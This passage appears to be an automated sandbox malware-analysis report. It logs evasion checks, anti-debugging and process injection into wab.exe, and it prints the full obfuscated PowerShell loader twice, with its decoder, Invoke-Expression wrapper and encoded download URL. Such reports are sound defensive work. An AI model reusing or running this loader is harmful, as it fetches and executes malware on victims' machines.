Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 248A0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 24AF0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 24990000 memory reserve | memory write watch			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7400			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2347			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4461

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632	Thread sleep time: -9223372036854770s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2516	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3076	Thread sleep count: 5391 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3076	Thread sleep count: 4461 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448	Thread sleep time: -4611686018427385s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: svchost.exe, 00000004.00000002.2411667354.000001BF4082B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPp
Source: powershell.exe, 00000001.00000002.1749219645.0000000006DDA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllmasaDiioddDreilFNamagi UsselB.rneeFlag.(Ulovm$,taurE Ok.endecoceUnhoubCitrorAvitarKlt ieTr ketVirils Un v, S.de$I.oprAGratip Pra h adeatLbelshMimreo F,reiGymnad Anme) Prim ';$Cancerne63=$Ballone[1]+$Cancerne63;$Aphthoid=$Ballone
Source: svchost.exe, 00000004.00000002.2414082915.000001BF45E53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.1521375542.00000000072D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4060000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 91FC30

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. ';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ponos.Lsi && echo $"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. ';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% 